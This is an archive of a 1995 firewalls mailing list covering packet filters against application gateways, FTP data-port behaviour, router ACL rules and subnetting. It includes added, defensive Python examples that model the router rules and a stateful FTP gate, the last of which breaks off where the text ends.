Anyway, you send info to gauntlet-info@tis.com or check out our web page at www.tis.com for more info (or drop me a note). Fred At 01:14 PM 10/12/95 -0700, Walt Herrmann wrote: >We are looking at purchasing the Firewall1 product. According to >the Trade magazines, as a firewall it appears to be the premire >product. If anyone has any additional competitive information >or experiences with Firewall1, I would appreciate passing it >along. Has anyone heard of V-ONE SmartWall as a firewall? Any >experiences. 
> > From firewalls-owner Thu Oct 12 13:02:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15772 for firewalls-outgoing; Thu, 12 Oct 1995 12:42:54 -0700 Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA15758 for ; Thu, 12 Oct 1995 12:42:49 -0700 Received: from crl13.crl.com by mail.crl.com with SMTP id AA27031 (5.65c/IDA-1.5 for ); Thu, 12 Oct 1995 12:40:16 -0700 Received: by crl13.crl.com id AA12108 (5.65c/IDA-1.5); Thu, 12 Oct 1995 12:26:13 -0700 Date: Thu, 12 Oct 1995 12:26:12 -0700 (PDT) From: Tim Keanini To: "A. Padgett Peterson, P.E. Information Security" Cc: firewalls@greatcircle.com Subject: Re: Microsoft FTP wierd In-Reply-To: <951011224606.2105dcc6@hobbes.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 11 Oct 1995, A. Padgett Peterson, P.E. Information Security wrote: > Robert rites: > >FTP.microsoft.com initiates all data port connections from random, > >high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently > >was intentional- there's a registry setting called "EnablePortAttack" that, > >when turned on, will cause the server to initiate connections from 20 again. > > Suspect this may also be fairly recent. Until about a month ago I was able > to connect to ftp.microsoft.com without problem but lately it has been > hanging. Suspect this is the problem since the firewall is set to > "paranoid". If what is happening is that the ftpd on the remote end is doing the active open on a high port back to the client, it could be that they are running mjr's aftpd. It is a beautiful thing. The idea is that because the ftpd does not have to bind to port20, then it will not have to run as root. Another beautiful thing. aftpd is wonderful and is up on ftp.tis.com. 
It is only for anonymous ftp sevices and is a very small piece of code to be read through in one sitting. --blast From firewalls-owner Thu Oct 12 13:44:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16345 for firewalls-outgoing; Thu, 12 Oct 1995 13:18:42 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA16330 for ; Thu, 12 Oct 1995 13:18:38 -0700 Received: from uucp4.UU.NET by relay3.UU.NET with SMTP id QQzlef03752; Thu, 12 Oct 1995 16:16:11 -0400 Received: from brite.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Thu, 12 Oct 1995 16:16:42 -0400 Received: from usrpc10.wichita.brite.com by brite.wichita.brite.com (5.65/1.35) id AA17421; Thu, 12 Oct 95 15:15:52 -0500 Date: Thu, 12 Oct 95 14:52:28 CDT From: Shane Kinsch Subject: FireWall-1 from Sun version 1.2.1 To: Firewall X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Locally, were setting up a firewall using FireWall-1 from Sun version 1.2.1. I would like to know if there is any reported security problems with this kit. If your using it, how do you like it, etc... Thanks for you input. Shane _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ Shane T Kinsch BRITE VOICE SYSTEMS, INC. 
_/ _/ shane.kinsch@brite.com UNIX SYSTEM ADMINISTRATOR _/ _/ Wichita, KS USA VP UNIX ENGINEERING _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Thu Oct 12 15:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18335 for firewalls-outgoing; Thu, 12 Oct 1995 14:47:06 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA18328 for ; Thu, 12 Oct 1995 14:47:03 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA25357; Thu, 12 Oct 1995 16:44:58 -0500 Date: Thu, 12 Oct 1995 16:44:58 -0500 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9510122144.AA25357@hosaka.smallworks.com> To: avolio@TIS.COM, firewalls@GreatCircle.COM, wherrman@strong-funds.com Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. >Application gateways are more secure. This statement is perhaps too strong. 
Jim From firewalls-owner Thu Oct 12 15:16:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18293 for firewalls-outgoing; Thu, 12 Oct 1995 14:45:19 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA18286 for ; Thu, 12 Oct 1995 14:45:15 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id RAA10944; Thu, 12 Oct 1995 17:43:21 -0400 From: David Kovar Message-Id: <199510122143.RAA10944@nda.nda.com> Subject: Re: Firewall1 Comparison To: avolio@TIS.COM (Frederick M Avolio) Date: Thu, 12 Oct 1995 17:43:20 -0400 (EDT) Cc: wherrman@strong-funds.com, firewalls@GreatCircle.COM In-Reply-To: <9510121925.AA01780@tis.com> from "Frederick M Avolio" at Oct 12, 95 03:25:48 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. > Application gateways are more secure. This is partly a religious issue. Depending on the nature of your network, and needs, and services, and human resources, and finances, one option may be more secure than another. You need to do a detailed evaluation of your environment and match that to the available offerings, based on as much knowledge about those offerings as you can get. Simply stating that "Application gateways are more secure." is a falsehood. 
-David From firewalls-owner Thu Oct 12 16:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19120 for firewalls-outgoing; Thu, 12 Oct 1995 15:48:38 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA19113 for ; Thu, 12 Oct 1995 15:48:32 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA02890; Fri, 13 Oct 1995 08:41:44 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma002883; Fri Oct 13 08:41:15 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA24425; Fri, 13 Oct 1995 08:47:19 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510122247.AA24425@citecub.citec.qld.gov.au> Subject: Re: Microsoft FTP wierd To: blast@crl.com (Tim Keanini) Date: Fri, 13 Oct 95 8:47:18 EST Cc: firewalls@greatcircle.com In-Reply-To: ; from "Tim Keanini" at Oct 12, 95 12:26 pm X-Mailer: ELM [version 2.3 PL11] content-length: 1132 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, All this talk of the Microsoft ftpd using ports other than 20 for the reverse connection has got me to start thinking (finally:-). The firewalls I have set up so far use an external router with filters that control inbound connections as follows: # mail feed allow tcp from *.*.*.* gt 1023 to bastion eq smtp # news feed allow tcp from newshost gt 1023 to bastion eq nntp # ftp data channel allow tcp from *.*.*.* eq 20 to bastion gt 1023 # return packets from any connection the bastion made allow tcp from *.*.*.* to bastion gt 1023 established Everything else is blocked. As it is now, the bastion cannot receive ftp data from anyone not using port 20. (This probably explains my inability to ftp anything from iwi.com, hey mjr). Am I being over-paranoid wrt the ftp data? 
Should I just replace the ftp rule with: # ftp data channels allow tcp from *.*.*.* eq 20 to bastion gt 1023 allow tcp from *.*.*.* gt 1023 to bastion gt 1023 [this of course obviates the need for the last rule (established)] and rely on netacl to control access to the other services I have listening on ports > 1023? Colin From firewalls-owner Thu Oct 12 18:00:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA20881 for firewalls-outgoing; Thu, 12 Oct 1995 17:49:45 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA20874 for ; Thu, 12 Oct 1995 17:49:42 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id UAA25496 for firewalls@greatcircle.com; Thu, 12 Oct 1995 20:48:15 -0400 From: "Marcus J. Ranum" Message-Id: <199510130048.UAA25496@switchblade.iwi.com> Subject: Re: NT FTP weirdness To: firewalls@greatcircle.com Date: Thu, 12 Oct 1995 20:48:15 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2256 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken Hardy writes: >>FTP.microsoft.com initiates all data port connections from random, >... >>Since ftp.microsoft.com's FTP-data connections weren't coming from port >>20, they weren't allowed in. > >Fine, let M$ redefine the standards, as is their wont, until nobody can >connect to them. Maybe if we all ignore them, they'll just go away. You'll notice that the FTP server on switchblade.iwi.com does not bind port 20, either. That's for a reason. The FTP protocol has a number of major security flaws in it (No - don't ask. If you're someone I'd tell, I've already told you. If I haven't already told you, you're not someone I'd tell.) that I discovered years ago. 
Most versions of UNIX out there have had the necessary fixes quietly added long enough ago that it's not a big problem, but who knows about everything else? The best way to fix some of the FTP protocol flaws and, by extension, the broken packet filters that trust or permit client-bound ports, is to break them so that they no longer work, and force people who want to use them to stop relying on broken features of broken protocols. FTP is overly long in the tooth and we should put it to bed *NOW*. I, unfortunately, do not have a service that is interesting or important enough to provide leverage, but what we need is someone with something everyone wants to provide it using a secure (and reasonably designed) file transfer protocol, and to only support that and no FTP. Backwards compatibility is one of the greatest foes of security. "It's broke and we can't fix it!" is what it amounts to. Hobbit writes: >I never quite understood why the spec wanted the back-connections to come from >port 20 in the first place, or for that matter why the *server* was supposed >to initiate back to the *client* at all. Case in point. The back connections on a bound client port is a relic of the days before IP had been invented. Sockets were uni-directional and if you wanted bi-directional data flow you had to use 2 sockets. Each server had to bind its own port and be (in effect) a mini inetd. Rather than scrap it and redesign it, we keep slapping patches and kluges onto a dead horse. Not only is it dead - as rob says - "it's starting to smell bad." mjr. 
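The router rule set Colin Campbell posted two messages up, and the looser replacement he asks about, applied to a few inbound packets. This is an added example written for this archive, not code from Colin, Marcus or any router vendor: the rule syntax is modelled on Colin's lines, and the names bastion and newshost, the addresses and the sample packets are constructed. Running it shows the two things a practitioner would want to check before making the change: the replacement admits any new high-port-to-high-port connection to the bastion (which is what netacl would then have to police), and it does not in fact make the "established" rule redundant, because a reply from a server on a low port such as 80 has a source port below 1024 and is dropped by the replacement.

```python
"""Stateless router ACL evaluator (added example; not from any post on the list).

Parses rules written in the style of Colin Campbell's router filter and
applies them to sample inbound packets, so the effect of his original
rule set and of the looser replacement he asks about can be compared.
The addresses for "bastion", "newshost" and the external host are
constructed test values.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

HOSTS = {"bastion": "192.0.2.10", "newshost": "198.51.100.5"}   # constructed
SERVICES = {"smtp": 25, "nntp": 119}


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    ack: bool = False      # True for every segment after the initial SYN


@dataclass(frozen=True)
class Rule:
    src: str
    sport: Optional[Tuple[str, int]]   # ("eq"|"gt", port) or None for any
    dst: str
    dport: Optional[Tuple[str, int]]
    established: bool


def _port(token: str) -> int:
    return SERVICES.get(token) or int(token)


def parse_rule(line: str) -> Rule:
    """Parse 'allow tcp from <h> [eq|gt p] to <h> [eq|gt p] [established]'."""
    t = line.split()
    if t[:3] != ["allow", "tcp", "from"]:
        raise ValueError(f"unsupported rule: {line!r}")
    i = 3
    src, i = t[i], i + 1
    sport = None
    if t[i] in ("eq", "gt"):
        sport, i = (t[i], _port(t[i + 1])), i + 2
    if t[i] != "to":
        raise ValueError(f"expected 'to' in {line!r}")
    dst, i = t[i + 1], i + 2
    dport = None
    if i < len(t) and t[i] in ("eq", "gt"):
        dport, i = (t[i], _port(t[i + 1])), i + 2
    established = i < len(t) and t[i] == "established"
    return Rule(src, sport, dst, dport, established)


def _host_ok(spec: str, addr: str) -> bool:
    return spec == "*.*.*.*" or HOSTS.get(spec, spec) == addr


def _port_ok(spec, port: int) -> bool:
    if spec is None:
        return True
    op, value = spec
    return port == value if op == "eq" else port > value


def matches(rule: Rule, pkt: Packet) -> bool:
    return (_host_ok(rule.src, pkt.src) and _host_ok(rule.dst, pkt.dst)
            and _port_ok(rule.sport, pkt.sport) and _port_ok(rule.dport, pkt.dport)
            and (pkt.ack or not rule.established))   # 'established' needs ACK set


def permitted(rules, pkt: Packet) -> bool:
    """Any-match allow; a packet no rule matches is dropped."""
    return any(matches(r, pkt) for r in rules)


def load(text: str):
    return [parse_rule(l) for l in text.splitlines() if l.strip() and not l.startswith("#")]


ORIGINAL = load("""
# mail feed
allow tcp from *.*.*.* gt 1023 to bastion eq smtp
# news feed
allow tcp from newshost gt 1023 to bastion eq nntp
# ftp data channel
allow tcp from *.*.*.* eq 20 to bastion gt 1023
# return packets from any connection the bastion made
allow tcp from *.*.*.* to bastion gt 1023 established
""")

PROPOSED = load("""
allow tcp from *.*.*.* gt 1023 to bastion eq smtp
allow tcp from newshost gt 1023 to bastion eq nntp
allow tcp from *.*.*.* eq 20 to bastion gt 1023
allow tcp from *.*.*.* gt 1023 to bastion gt 1023
""")

B = HOSTS["bastion"]
EXT = "203.0.113.7"      # constructed external host
SAMPLES = {              # constructed inbound packets
    "ftp-data from port 20":          Packet(EXT, 20, B, 40001),
    "ftp-data from a random port":    Packet(EXT, 45231, B, 40001),
    "new connection to a high port":  Packet(EXT, 44444, B, 8080),
    "reply to bastion's http fetch":  Packet(EXT, 80, B, 33000, ack=True),
}


def compare(samples=SAMPLES):
    """Map each sample to (permitted by ORIGINAL, permitted by PROPOSED)."""
    return {name: (permitted(ORIGINAL, p), permitted(PROPOSED, p))
            for name, p in samples.items()}


if __name__ == "__main__":
    for name, (orig, prop) in compare().items():
        print(f"{name:32s} original={orig!s:5s} proposed={prop}")
```

The evaluator is deliberately as dumb as the router: it matches on addresses, ports and the ACK bit and keeps no state, which is exactly why a data connection from an unprivileged port looks the same to it as any other inbound connection attempt.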
From firewalls-owner Thu Oct 12 18:31:17 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Thu, 12 Oct 95 21:20:04 -0400
To: firewalls@greatcircle.com
Subject: Various FTPs

I agree with Marcus concerning the problems in FTP & possibly IPV6 will
repair/replace it. For now I suspect that the answer is a firewall that
will only allow an inward port 20 connection if the inside node already had
a port 21 outward connection (No, I do not mean via "established"; I mean
the firewall should keep track of what connections exist). This will work
with current systems without retrofit.

Now on reflection I suspect macrosloth is different from the IWI site
(Marcus' code) since the lockup occurs on connection before I even have a
chance to issue PASV - that worked to IWI.

Warmly,
Padgett

From firewalls-owner Thu Oct 12 19:00:18 1995
From: Steve Kennedy
Date: Fri, 13 Oct 1995 02:53:34 +0100 (BST)
To: firewalls@greatcircle.com
Subject: New Scientist letter

New Scientist is a UK publication that covers science topics in general;
here is a letter they published (I'm re-typing without permission).

> "Oh yeah?"
>
> In your article on computer hackers ("Catching Kevin and his Friends" 2
> Sept), Joe Flowers quotes William Cheswick of AT&T and his co-author
> Steve Bellovin as claiming to have "never had an undetected illegal
> entry through our firewall". Well, they have.
>
> Steve Elliott, Balmain, Australia

Regards

Steve

--
home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU
work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103
www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500
bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502
Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk)

From firewalls-owner Thu Oct 12 22:13:15 1995
From: dnewman@mcgraw-hill.com
Date: Thu, 12 Oct 95 22:36:48 EDT
To: vjm@relevantum.fi, firewalls@greatcircle.com
Subject: RE: route and Win95

There is one scenario in which Windows 95 will send advertisements--but
only for Novell NetWare's IPX SAP. As with IP routing, the default setting
is to disable SAP broadcasts. If NetWare file and print sharing is enabled,
however, it's possible to turn on SAP advertisements. Then the 95 machine
appears as a NetWare server, and NetWare clients that attach to it won't be
able to reach real NetWare servers until the Win95 machine is shut down.
Microsoft says its forthcoming NDS client will address this.

dn

From firewalls-owner Thu Oct 12 23:43:30 1995
From: Mark
Date: Fri, 13 Oct 1995 14:49:02 +1000
To: steve@gbnet.org (Steve Kennedy)
Cc: firewalls@GreatCircle.COM
Subject: Re: New Scientist letter

>> "Oh yeah?"
>>
>> In your article on computer hackers ("Catching Kevin and his Friends" 2
>> Sept), Joe Flowers quotes William Cheswick of AT&T and his co-author
>> Steve Bellovin as claiming to have "never had an undetected illegal
>> entry through our firewall". Well, they have.
>>
>> Steve Elliott, Balmain, Australia

Whilst I don't want to give Australia a bad rep on this topic, I also know
of other penetrations into the att.com domain. It was through
research.att.com as well, not bypassing it. Whether this entry continues I
am not certain about.

How is this related to Kevin? He was a phreaker, not a cracker (of the
above skill). Admittedly his antics were cheeky when you look at the whole
picture. His skills in social engineering were the key to his success. A
number of people still don't realise they were "done" by him.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.
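Back to Padgett's suggestion a few messages up, that the firewall should remember which control connections exist rather than trusting the "established" keyword: the following is an added example for this archive, not code from Padgett, Marcus or any firewall product, of what that bookkeeping looks like. An inbound connection to an inside host is admitted only while that host has its own control connection open to port 21 on the same server, and it is dropped once the control channel is torn down. As an added generalization beyond Padgett's "inward port 20" wording, the strict_port20 switch lets the gate also admit data channels opened from an unprivileged port (the behaviour this thread observed) while still tying them to a live session. The internal prefix, addresses and packet trace are constructed.

```python
"""Stateful FTP data-channel gate (added example; not code from any list post).

Implements the rule Padgett sketches: an inbound connection to an inside
host is admitted only while that host has a control connection of its own
open to port 21 on the same server, which the gate remembers rather than
inferring from the ACK bit. As an added generalization, strict_port20=False
also admits servers that open the data channel from an unprivileged port,
still tied to a live control session. Prefix and trace are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INSIDE = ip_network("192.0.2.0/24")   # constructed internal prefix
FTP_CONTROL, FTP_DATA = 21, 20


@dataclass(frozen=True)
class Seg:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False
    fin: bool = False
    rst: bool = False


class FtpGate:
    def __init__(self, strict_port20: bool = True):
        self.strict = strict_port20
        self.sessions = set()   # (inside host, server) pairs with an open control channel

    @staticmethod
    def _inside(addr: str) -> bool:
        return ip_address(addr) in INSIDE

    def handle(self, s: Seg) -> str:
        """Classify one segment: 'allow'/'drop' for inbound connection attempts,
        'pass' for everything else (left to the ordinary rule set)."""
        outbound = self._inside(s.src) and not self._inside(s.dst)
        inbound = self._inside(s.dst) and not self._inside(s.src)
        if not (outbound or inbound):
            return "pass"
        key = (s.src, s.dst) if outbound else (s.dst, s.src)

        # Control channel (inside:any <-> server:21): only bookkeeping here.
        if (outbound and s.dport == FTP_CONTROL) or (inbound and s.sport == FTP_CONTROL):
            if outbound and s.syn and not s.ack:
                self.sessions.add(key)        # inside host opened a session
            elif s.fin or s.rst:
                self.sessions.discard(key)    # either side tore it down
            return "pass"

        # A new inbound connection is admitted only as FTP data for a live session.
        if inbound and s.syn and not s.ack:
            related = key in self.sessions
            port_ok = s.sport == FTP_DATA or not self.strict
            return "allow" if related and port_ok and s.dport > 1023 else "drop"
        return "pass"


CLIENT, SERVER, OTHER = "192.0.2.10", "203.0.113.7", "198.51.100.99"   # constructed
TRACE = [   # constructed segments seen at the external interface, in order
    Seg(CLIENT, 3456, SERVER, 21, syn=True),             # client opens control channel
    Seg(SERVER, 21, CLIENT, 3456, syn=True, ack=True),   # server's SYN/ACK
    Seg(SERVER, 20, CLIENT, 3457, syn=True),             # data channel from port 20
    Seg(OTHER, 20, CLIENT, 3458, syn=True),              # port 20, but no session with OTHER
    Seg(SERVER, 40000, CLIENT, 3459, syn=True),          # data channel from a high port
    Seg(CLIENT, 3456, SERVER, 21, fin=True, ack=True),   # client closes control channel
    Seg(SERVER, 20, CLIENT, 3460, syn=True),             # too late: session is gone
]


def run_trace(strict_port20: bool = True):
    """Feed TRACE through a fresh gate and return the verdict for each segment."""
    gate = FtpGate(strict_port20)
    return [gate.handle(s) for s in TRACE]


if __name__ == "__main__":
    print("strict :", run_trace(True))
    print("relaxed:", run_trace(False))
```

The gate keys sessions on the (client, server) address pair, so for the life of a control session it admits any new high-port connection from that server to the client; binding the data channel to the exact port the client announced would require reading the PORT command off the control channel, which is tighter but means inspecting payload rather than headers. Note also that a source port of 20 on its own buys nothing here: the OTHER segment in the trace is dropped because no session exists with that server.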
From firewalls-owner Fri Oct 13 00:43:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25984 for firewalls-outgoing; Fri, 13 Oct 1995 00:29:44 -0700 Received: from mickey.iafrica.com (mickey.iafrica.com [192.96.87.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA25977 for ; Fri, 13 Oct 1995 00:29:34 -0700 Received: from jumper by mickey.iafrica.com with smtp (Smail3.1.29.1 #22) id m0t3eWi-000C3KC; Fri, 13 Oct 95 09:27 GMT+0200 Message-Id: Comments: Authenticated sender is From: "Mark Maunder" To: firewalls@greatcircle.com Date: Fri, 13 Oct 1995 09:27:09 +0000 Subject: Newbie looking for advice... Reply-to: markdm@iafrica.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm new on the TCP/IP network scene and am involved in the programming of a large web site and have been roped in to arrange some security for our site. We have an ethernet network with two NetWare boxes and an AS400 and a wide area link to a few other branches. The network runs TCP/IP as well as IPX. We are putting in a leased line and will have the line going via a router into our little ethernet network on which our WWW server will be sitting. Perhaps someone can tell me if this is total fantasy, but would it be a good start (and possible) to configure the router to only allow connects from the outside to certain hosts on the inside - and to only allow through HTTP packets? Also could we configure it to make sure that no one on the outside has an IP address that is supposed to be on the inside? ( IP Spoofing) Does this sound like a good start for a low cost firewall - or am I totally off the track here? Is configuring a router a reasonable security measure? Perhaps someone can point me in the right direction. My apologies for the waste of mailbox space. Mark Maunder (markdm@iafrica.com) Novell support engineer. 
From firewalls-owner Fri Oct 13 01:43:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA27276 for firewalls-outgoing; Fri, 13 Oct 1995 01:41:03 -0700 Received: from world-net.sct.fr (world-net.sct.fr [194.2.128.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA27269 for ; Fri, 13 Oct 1995 01:40:55 -0700 From: savron@world-net.sct.fr Received: from 194.2.128.1.sct.fr. (client41.sct.fr [194.2.128.71]) by world-net.sct.fr (8.6.12/8.6.10) with SMTP id JAA17359 for ; Fri, 13 Oct 1995 09:36:09 +0100 Date: Fri, 13 Oct 1995 09:36:09 +0100 Message-Id: <199510130836.JAA17359@world-net.sct.fr> X-Sender: savron@world-net.sct.fr (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com Subject: firewalls for WIN95 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there any firewalling solution for a WIN95 PC? Thanks From firewalls-owner Fri Oct 13 03:43:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA29645 for firewalls-outgoing; Fri, 13 Oct 1995 03:34:48 -0700 Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA29636 for ; Fri, 13 Oct 1995 03:34:38 -0700 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id LAA17906 for ; Fri, 13 Oct 1995 11:08:38 +0100 Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id LAA12385 for ; Fri, 13 Oct 1995 11:32:27 +0100 From: Danny Cox Date: Fri, 13 Oct 1995 11:28:42 +0100 Message-Id: <6373.9510131028@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Modems and IPX tunnelling X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Fri, 13 Oct 1995 04:34:56 -0700 Received: (pferguso@localhost) 
by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id EAA20326; Fri, 13 Oct 1995 04:32:28 -0700 From: Paul Ferguson Message-Id: <199510131132.EAA20326@lint.cisco.com> Subject: Re: Newbie looking for advice... To: markdm@mickey.iafrica.com (Mark Maunder) Date: Fri, 13 Oct 95 4:32:28 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Mark Maunder" at Oct 13, 95 9:27 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Perhaps someone can tell me if this is total fantasy, but would it be > a good start (and possible) to configure the router to only allow > connects from the outside to certain hosts on the inside - and to > only allow through HTTP packets? Also could we configure it to make > sure that no one on the outside has an IP address that is supposed to > be on the inside? ( IP Spoofing) > The 'fix' to block spoofing is a simple one. If you are using access control mechanisms, simply place an access control list on the inbound interface explicitly denying entrance to any packet which claims to be from the internal network (address). Voila. As to any methodologies which allow access to particular internal devices, there are certain risks in this approach. By allowing explicit transient access directly to an internal device, you expose them to greater risk of compromise. - paul -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. 
c i s c o S y s t e m s From firewalls-owner Fri Oct 13 05:43:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01778 for firewalls-outgoing; Fri, 13 Oct 1995 05:36:42 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA01771 for ; Fri, 13 Oct 1995 05:36:37 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id FAA28028; Fri, 13 Oct 1995 05:34:35 -0700 From: Paul Ferguson Message-Id: <199510131234.FAA28028@lint.cisco.com> Subject: Re: First and last subnet ??? To: yg@muturl.planet-int.net (Yannick Gravel) Date: Fri, 13 Oct 95 5:34:35 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Yannick Gravel" at Oct 11, 95 10:46 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends. If you are using a classless routing protocol, you can certainly use these subnets. If you are using a classful routing protocol, then it depends on the vendor platform and if they have a mechanism that supports explicit use of these subnets. A word of caution is needed, however, since using them is not RFC compliant. :-) - paul > > Hi Net&Sys Security peoples, > > Something that everybody is talking about, but not everybody > is saying the same thing about subnetting: > > Yes, everybody agrees that we lose the first and last host of > each subnet for net.iding and broadcasting. > > But, some are saying that I can use all subnets; but others are > saying that we lose the first and last subnet... > > Whose truth is true.. > > Thanks.. > > Yannick Gravel > System administrator -- yannick.gravel@planet-int.net > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. 
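Yannick's question and Paul's answer, worked through as an added example (this code is not from any message in the thread; it uses only the Python standard library). It lists the subnets of a classful network, flags subnet zero and the all-ones subnet, and shows why a routing update that carries no mask cannot tell the network number from subnet zero, which is the same point Howard Berkowitz and Andrew Foss make later in this thread with 172.31.0.0 and 198.9.200.0.

```python
"""Subnet zero and the all-ones subnet, worked through with the standard library.

Added example, not taken from any message in this thread. It reproduces the
ambiguity the thread turns on: once a classful network is subnetted, the first
subnet's network address and the last subnet's broadcast address are the same
bit patterns as the network number and the all-subnets broadcast, and a routing
update that carries no mask cannot say which is meant.
"""
from ipaddress import ip_address, ip_network


def classful_prefix(net):
    """Prefix length implied by the first octet under the old class A/B/C rules."""
    first = int(net.network_address) >> 24
    if first < 128:
        return 8
    if first < 192:
        return 16
    if first < 224:
        return 24
    raise ValueError(f"{net} is not a class A, B or C network")


def subnets_with_flags(classful_network, new_prefix):
    """List the subnets of a classful network at new_prefix.

    Returns (subnet, usable_hosts, flags); flags is non-empty for the two
    subnets the RFC 950 subnetting rules tell you not to assign.
    """
    net = ip_network(classful_network)
    if net.prefixlen != classful_prefix(net):
        raise ValueError("pass the classful network, e.g. 172.31.0.0/16, not a subnet")
    result = []
    for sub in net.subnets(new_prefix=new_prefix):
        flags = []
        if sub.network_address == net.network_address:
            flags.append("subnet zero: its address is also the network number")
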